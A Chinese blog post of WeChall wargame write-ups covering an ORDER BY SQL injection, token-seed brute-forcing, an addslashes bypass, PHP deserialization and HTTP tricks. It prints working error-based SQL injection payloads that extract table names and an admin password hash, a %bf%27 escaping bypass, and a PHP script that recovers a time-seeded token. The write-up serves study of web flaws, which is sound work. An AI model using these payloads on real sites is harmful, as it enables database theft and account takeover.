wechall writeup(1)

order by query PHP

看关键代码:

1
2
3
4
5
6
7
if (!in_array($orderby, $whitelist)) {
return htmlDisplayError('Error 1010101: Not in whitelist.');
}

$orderby = $db->escape($orderby);

$query = "SELECT * FROM users ORDER BY $orderby $dir LIMIT 10";

这里有个php trick

1
2
3
4
5
$names = array(1 => 'Username', 3 => 'Apples', 4 => 'Bananas', 5 => 'Cherries');
$orderby = '5 and 123';
in_array($orderby, $whitelist)

得到结果为真(1)。

order by 注入总结: http://www.jinglingshu.org/?p=10105 报错注入:http://joychou.org/index.php/web/SQL-Injections-in-MySQL-LIMIT-clause.html

  • 首先确定是可以进行注入攻击的:

    http://www.wechall.net/challenge/order_by_query/index.php?by=3%20ASC%20--  

会返回所有数据,并升序排列。

  • 利用

由于无法使用union来获取数据,便只能盲注或者报错注入。 本来可以:

1
2
if(1<2,3,5)
if(1>2,3,5)

这样盲注,但是由于题目有限制,所以这里使用盲注直接得到数据比较方便。

1
3 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) --

来个花式的另一种报错注入方式:

1
?by=3  PROCEDURE analyse(extractvalue(rand(),concat(0x3a,database())),1) --

可以获取数据库名称为gizmore_as2。 然后是老套路:

1
?by=3  PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(select table_name  from information_schema.tables where table_schema=0x67697a6d6f72655f617332))),1) --

0x67697a6d6f72655f617332可以绕过单引号,表示数据库名gizmore_as2。得到表名users

1
?by=3  PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(select column_name  from information_schema.columns where table_schema=0x67697a6d6f72655f617332 and table_name=0x7573657273 limit 1,1))),1) --

得到列名为password。 最终得到名字和密码:

1
http://www.wechall.net/challenge/order_by_query/index.php?by=3  PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(select concat(username,0x3a,password) from users limit 2,1))),1) --

GDO Error(1105): XPATH syntax error: ':Admin:3C3CBEB0C8ADC66F2922C65E7'

basic rewrite HTTP

题目简单要求搭建自己的webserver,使用Docker搭建下。后面个题目需要用到大数据加法,于是就这样了: Dokerfile:

1
2
3
4
5
6
7
FROM phpfpm:with_mysql

# Install phpseclib
RUN pear channel-discover phpseclib.sourceforge.net \
&& pear install phpseclib/Math_BigInteger

CMD ["php-fpm"]

docker-compose.yml:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
phpfpm_db:
build: ./web
volumes:
- ./web/webcode:/webcode
nginx_server:
image: nginx:1.8
links:
- phpfpm_db:phpfpm_db
volumes:
- ./server/conf/default_server.conf:/etc/nginx/conf.d/default.conf
- ./server/logs:/var/log/nginx
volumes_from:
- phpfpm_db
ports:
- "8088:80"

写个脚本,让wechall访问:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import requests
from requests.auth import HTTPBasicAuth
import sys

session = requests.Session()

def go():
post_data = {'port':'8088','go':'I have set it up. Please check my server.'}
#url = "http://www.wechall.net/challenge/training/www/basic/index.php";
url = "http://www.wechall.net/challenge/training/www/rewrite/index.php"
headers = {"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.5",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0",
"Cookie":"WC=********",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Connection": "keep-alive"}
response = session.post(url, headers=headers,data=post_data)
print response.text


if __name__ == '__main__':
go();

reset to time PHP

可以和0ctf2016那个random进行对比。那个更加难一点,参考:
http://www.mscs.dal.ca/~selinger/random/ 本题是用了时间作为种子,于是我们只要爆破出时间种子即可。代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<?php

function ttr_random($len, $alpha='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
{
$alphalen = strlen($alpha) - 1;
$key = '';
for($i = 0; $i < $len; $i++)
{
$key .= $alpha[rand(0, $alphalen)];
}
return $key;
}


$csrf = "leqJygumb3PCOytrRRd4hUaGoQEcRhk2";

//$time = mktime(09,03,04,04,18,2016);
$time = time()-500;
$tmp = "";
$i = 0;
for($i = 0;$i < 1000;$i++)
{
srand($time + $i);
$tmp = ttr_random(32);
if($tmp == $csrf)
break;
}
echo $tmp."\n";
echo $i."\n";

$token = ttr_random(16);
print $token."\n";

$res = "qJmSkxxx9rMZXO2I";
print $token == $res;

?>

得到种子后,结课得到后面生成的验证token。

addslashes

1
2
%bf%27 bypass addslashes function.  
0x41646d696e represent 'Admin'

are you serial

一个简单的反序列化问题,如下脚本生成一个序列化对象即可:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
require_once('serial_user.php');
require_once('serial_solution.php');
$username = "admin";
$password = "admin";
$userlevel = 1;
$user = new SERIAL_User($username, $password, $userlevel);

$serial_user = serialize($user);
//echo $serial;

$solution = new SERIAL_Solution();
$serial_solution = serialize($solution);
echo $serial_solution;

?>

net ports

发现了curl一个有意思的参数:

1
2
3
直接加上`--local-port 42`  

curl 'http://www.wechall.net/challenge/training/net/ports/index.php' --local-port 42 -H 'Accept-Encoding: gzip, deflate, sdch' -H 'Accept-Language: zh-CN,zh;q=0.8' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Referer: http://www.wechall.net/challs/HTTP/by/chall_score/ASC/page-1' -H 'Cookie: WC=***' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' --compressed
文章作者: angelwhu
文章链接: https://www.angelwhu.com/paper/2016/05/20/wechall-writeup1/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 angelwhu_blog